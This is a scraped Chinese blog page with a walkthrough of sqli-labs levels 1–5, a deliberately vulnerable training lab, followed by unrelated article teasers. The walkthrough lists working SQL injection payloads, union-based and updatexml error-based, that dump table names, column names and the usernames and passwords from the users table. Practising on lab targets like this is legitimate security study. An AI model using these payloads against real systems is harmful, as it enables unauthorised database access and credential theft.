当前位置：首页 > news >正文

sqli-labs-master靶场通关

news 2026/5/14 3:34:56

一、sqli-labs第一关

1.判断是否存在sql注入

（1）提示输入数字值的ID作为参数，输入?id=1

（2）通过数字值不同返回的内容也不同，所以我们输入的内容是带入到数据库里面查询了

（3）接下来我们判断sql语句是否是拼接，且是字符型还是数字型

2.联合注入

（1）首先知道表格有几列，如果报错就是超过列数，如果显示正常就是没有超出列数

（2）爆出显示位，就是看看表格里面那一列是在页面显示的。可以看到是第二列和第三列里面的数据是显示在页面的

（3）获取当前数据名和版本号，通过结果知道当前数据看是security，版本是8.0.12

（4）爆表

（5）爆字段名

（6）查询字段对应内容

二、sqli-labs第二关

三、sqli-labs第三关

四、sqli-labs第四关

五、sqli-labs第五关

一、sqli-labs第一关

1.判断是否存在sql注入

（1）提示输入数字值的ID作为参数，输入?id=1

（2）通过数字值不同返回的内容也不同，所以我们输入的内容是带入到数据库里面查询了

（3）接下来我们判断sql语句是否是拼接，且是字符型还是数字型

可以根据结果指定是字符型且存在sql注入漏洞。因为该页面存在回显，所以我们可以使用联合查询。联合查询原理简单说一下，联合查询就是两个sql语句一起查询，两张表具有相同的列数，且字段名是一样的

2.联合注入

（1）首先知道表格有几列，如果报错就是超过列数，如果显示正常就是没有超出列数

?id=1'order by 3 --+

?id=1'order by 4 --+

（2）爆出显示位，就是看看表格里面那一列是在页面显示的。可以看到是第二列和第三列里面的数据是显示在页面的

?id=-1'union select 1,2,3--+

（3）获取当前数据名和版本号，通过结果知道当前数据看是security，版本是8.0.12

（4）爆表

information_schema.tables表示该数据库下的tables表，点表示下一级，where后面是条件

SELECT table_name FROM information_schema.tables WHERE table_schema = 'security';

group_concat()是将查询到结果连接起来

SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'security';

?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

（5）爆字段名

通过sql语句查询知道当前数据库有四个表，根据表名知道可能用户的账户和密码是在users表中。接下来我们就是得到该表下的字段名以及内容

?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

该语句的意思是查询information_schema数据库下的columns表里面且table_users字段内容是users的所有column_name的内，可以得到两个敏感字段就是username和password

（6）查询字段对应内容

?id=-1' union select 1,2,group_concat(username ,id , password) from users--+

二、sqli-labs第二关

进入sqli-labs-master靶场第二关，加入参数?id=1

当输入单引号或者双引号可以看到报错，且报错信息看不到数字，所有我们可以猜测sql语句应该是数字型注入

使用order by 判断数据库有几列：3列回显正常，4列出现报错，说明只有3列

?id=1 order by 3

使用联合查询union select判断回显位置

?id=-1 union select 1,2,3

发现2和3的回显，判断数据库名称

?id=-1 union select 1,database(),version()

查询到库名后查询库下所有表

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'

判断users表中下的字段名称

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'

查询字段中的数据

?id=-1 union select 1,2,group_concat(username ,id , password) from users

三、sqli-labs第三关

进入sqli-labs-master靶场第二关，加入参数?id=1

加单引号判断闭合，通过报错信息可以发现是以单引号和括号进行闭合的

?id=2')--+

使用order by判断数据库有几列：3列回显正常，4列出现报错，说明只有3列

?id=1') order by 3--+

使用联合查询union select判断回显位置

?id=-1') union select 1,2,3--+

发现2和3的回显，判断数据库名称

?id=-1') union select 1,database(),version()--+

查询到库名后查询库下所有表

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

判断users表中下的字段名称

?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

查询字段中的数据

?id=-1') union select 1,2,group_concat(username ,id , password) from users--+

四、sqli-labs第四关

根据页面报错信息得知sql语句是双引号字符型且有括号，通过以下代码进行sql注入（与第三关步骤相同）

?id=1") order by 3--+
?id=-1") union select 1,2,3--+
?id=-1") union select 1,database(),version()--+
?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
?id=-1") union select 1,2,group_concat(username ,id , password) from users--+

五、sqli-labs第五关

进入sqli-labs-master靶场第五关，加入参数?id=1

发现没有回显，判断闭合方式为单引号闭合

?id=1' and 1=1--+

?id=1' and 1=2--+

爆库名

?id=1' and updatexml(1,concat(0x7e,(database()),0x7e),1) --+

爆表名

?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e),1) --+

只有1列加入参数

?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) --+

爆列名

?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+

爆数据

?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,password)from users),0x7e),1) --+

sqli-labs-master靶场通关

目录一、sqli-labs第一关 1.判断是否存在sql注入 （1）提示输入数字值的ID作为参数，输入?id1 （2）通过数字值不同返回的内容也不同，所以我们输入的内容是带入到数据库里面查询了 （3&#xff0…...

编程日记 2024/8/15 21:56:34

hive sql 处理多层 json 数组

1. 背景 json 字符串值数据示例： {"score": 1,"submitTime": 1712491933,"answerFlag": 1,"groupId": 1755547960,"answers": [{"value": "[1, 2, 3]","ids": [4,5,6],"is…...

编程日记 2024/8/15 21:54:32

Dom 元素转换 Image 图片 (截图) dom-to-image dom-to-image NPM 官网文档参考文章码上行舟 dom-to-image 是如何将 html 转换成图片的(文章参考) 安装 npm install dom-to-image --save 使用 /* in ES 6 */ import domtoimage from "dom-to-image"; /* in ES 5 *…...

编程日记 2024/8/15 21:53:31

零售业务产品系统应用架构设计（二）

ETC信用结算系统根据《加快推进高速公路电子不停车快捷收费应用服务实施方案》（发改基础〔2019〕935号），拓宽ETC发行服务渠道。推动建立全网协同服务模式，完善服务规则，鼓励银行业金融机构、非银行支付机构和互联网企业等服务机构紧密合作。允许ETC绑定既有银行账户和支付…...

编程日记 2024/8/15 21:52:30

Linux速成入门教程——从零基础开始快速入门，一文了解Linux用户管理与权限

2.1 用户与组管理用户与组的基本概念在Linux系统中，用户和组是管理权限和资源访问的基本单元。每个用户都有一个唯一的用户ID（UID），每个组都有一个唯一的组ID（GID）。用户可以属于一个或多个组&#xff…...

编程日记 2024/8/15 21:50:28

网工内推 | 宁德时代IT运维，晋升空间大，带薪年假，包吃包住

01 宁德时代 🔷招聘岗位：IT运维服务 🔷任职要求 1、大专及以上学历专业不限，应届毕业生或计算机、网络维护等相关专业优先； 2、具备较强的服务意识和良好的语言表达能力、沟通能力、记忆能力、心理承受能力和学习能力…...

编程日记 2024/8/15 21:48:25

Linux---系统安全

文章目录系统安全系统账号清理密码安全控制命令历史限制终端自动注销如设置时间短的处理方式使用su命令切换用户用途及用法密码验证限制使用su命令的用户查看su操作记录限制使用su命令的用户查看su操作记录su命令的安全隐患 PAM(Pluggable Authentication Modules)可插拔式认…...

编程日记 2024/8/15 21:46:24

手写数字识别实战

全部代码： import matplotlib.pyplot import torch from torch import nn # nn是完成神经网络相关的一些工作 from torch.nn import functional as F # functional是常用的一些函数 from torch import optim # 优化的工具包import torchvision from matplotlib …...

编程日记 2024/8/15 21:45:23

二叉树遍历

二叉树的遍历是二叉树操作中的一个基本且重要的概念，它指的是按照一定的规则访问二叉树中的每个节点，并且每个节点仅被访问一次。常见的二叉树遍历方式有四种：前序遍历（Pre-order Traversal）、中序遍历（In-…...

编程日记 2024/8/15 21:44:21

uni app 调用前置摄像头

uniapp开发app并没有相关Api调用前置摄像头。只能使用5app的api 调用前置摄像头拍照 plus.camera.getCamera(index) 获取需要操作的摄像头对象，如果要进行拍照或摄像操作，需先通过此方法获取摄像头对象 index指定要获取摄像头的索引值，1表…...

编程日记 2024/8/15 21:43:21

哈工大李治军老师OS课程笔记（4）——内存管理

一内存使用与分段（实验六） 内存是如何用起来的？ 内存使用：将程序放在内存中，PC指向开始地址重定位：修改程序中的地址（是相对地址） 什么时候完成重定位？ 编译时加基址…...

编程日记 2024/8/15 21:42:20

代码随想录算法训练营第43天：动态规划part10：子序列问题

300.最长递增子序列力扣题目链接(opens new window) 给你一个整数数组 nums ，找到其中最长严格递增子序列的长度。子序列是由数组派生而来的序列，删除（或不删除）数组中的元素而不改变其余元素的顺序。例如，[3,6,2…...

编程日记 2024/8/15 21:41:19

传智教育引通义灵码进课堂，为技术人才教育学习提效

7 月 17 日，阿里云与传智教育在阿里巴巴云谷园区签署合作协议，双方将基于阿里云智能编程助手通义灵码在课程共建、品牌合作及产教融合等多个领域展开合作，共同推进 AI 教育及相关业务的发展，致力于培养适应未来社会需求的高素质技…...

编程日记 2024/8/15 21:38:15

企业信息化建设搞得好了叫系统工程，搞不好叫面子工程

2024-06-13 09:26贝格前端工场...

编程日记 2024/8/15 21:36:14

程序员如何平衡日常编码工作与提升式学习？

在快速变化的编程领域中，平衡日常编码工作与个人成长确实是一个重要且富有挑战性的议题。以下是我对这一问题的看法和建议： 1. 认识到平衡的重要性首先，理解两者之间的平衡并非零和游戏，而是相辅相成的。高效的编码工作能够为个…...

编程日记 2024/8/15 21:35:13

Linux---文件系统和日志分析

文章目录文件系统和日志分析inode和block概述inode包含文件的元信息用stat命令可以查看某个文件的inode信息Linux系统文件三个主要的时间属性目录文件的结构用户通过文件名打开文件时，系统内部的过程查看inode号码的方法硬盘分区后的结构访问文件的简单流程inode的…...

编程日记 2024/8/15 21:34:12

MySQL 体系架构

文章目录一. MySQL 分支与变种1. Drizzle2. MariaDB3. Percona Server 二. MySQL的替代1. Postgre SQL2. SQLite 三. MySQL 体系架构1.连接层2 Server层（SQL处理层）3. 存储引擎层1）MySQL官方存储引擎概要2）第三方引擎3&#xff0…...

编程日记 2024/8/15 21:29:07

跨站脚本攻击漏洞

1.JavaScript JavaScript 是一种脚本，一门编程语言，它可以在网页上实现复杂的功能，网页展现给你的不再是简单的静态信息，而是实时的内容更新，交互式的地图，2D/3D动画，滚动播放的视频等等。 &a…...

编程日记 2024/8/15 21:28:06

RabbitMQ入门与进阶

RabbitMQ入门与进阶基础篇1. 为什么需要消息队列?2. 什么是消息队列?3. RabbitMQ体系结构介绍4. RabbitMQ安装5. HelloWorld6. RabbitMQ经典用法(工作模式)7. Work Queues8. Publish/Subscribe9. Routing10. Topics 进阶篇1. RabbitMQ整合SpringBoot2. 消息可靠性投递故障情…...

编程日记 2024/8/15 21:27:05

Unity新输入系统之 InputActions（输入配置文件）

本文仅作笔记学习和分享，不用做任何商业用途本文包括但不限于unity官方手册，unity唐老狮等教程知识，如有不足还请斧正首先你应该了解新输入系统的基本单位Unity新输入系统之 InputAction（输入配置文件最基本的单位&#xff0…...

编程日记 2024/8/15 21:20:58

书匠策AI：你的毕业论文“外挂“已上线，看完这篇你就懂了

各位同学们，我是你们的论文科普老朋友。今天不讲格式、不讲开题报告怎么凑字数，咱们来聊一个能让你从"头秃"变成"头不秃"的神奇工具——书匠策AI。没错，就是那个官网官网直达：www.shujiangce.com上让无数毕…...

编程新知 2026/5/14 3:10:27

Fast-GitHub：国内开发者必备的GitHub下载加速终极方案

Fast-GitHub：国内开发者必备的GitHub下载加速终极方案【免费下载链接】Fast-GitHub 国内Github下载很慢，用上了这个插件后，下载速度嗖嗖嗖的~！ 项目地址: https://gitcode.com/gh_mirrors/fa/Fast-GitHub 对于身处国内的开…...

编程新知 2026/5/14 3:04:08

Loop：三步快速配置，让你的Mac窗口管理效率提升300%

Loop：三步快速配置，让你的Mac窗口管理效率提升300% 【免费下载链接】Loop Window management made elegant. 项目地址: https://gitcode.com/GitHub_Trending/lo/Loop 你是否经常在多个应用窗口间来回切换，感觉自己像个杂技演员&#…...

编程新知 2026/5/14 1:44:02

AI 重构泳装产业，先智先行如何破解行业痛点

春夏季泳装市场需求旺盛，但多数企业深陷效率与成本双重焦虑：设计周期冗长、打板损耗偏高、营销内容同质化严重，难以快速响应潮流变化。北京先智先行科技有限公司聚焦 AI 技术赋能，推出 “先知大模型”“先行 AI 商学院”“先知 AI…...

编程新知 2026/5/14 1:21:15

在Windows平台解锁iOS应用的全新体验：ipasim模拟器深度解析

在Windows平台解锁iOS应用的全新体验：ipasim模拟器深度解析【免费下载链接】ipasim iOS emulator for Windows 项目地址: https://gitcode.com/gh_mirrors/ip/ipasim 想象一下这样的场景：作为一名开发者，你收到一个紧急的iOS应用测试…...

编程新知 2026/5/14 1:15:02

终极免费图片去重神器：AntiDupl.NET 完全指南，快速清理重复图片释放硬盘空间

终极免费图片去重神器：AntiDupl.NET 完全指南，快速清理重复图片释放硬盘空间【免费下载链接】AntiDupl A program to search similar and defect pictures on the disk 项目地址: https://gitcode.com/gh_mirrors/an/AntiDupl 你是否曾因电脑中堆…...

编程新知 2026/5/14 0:28:28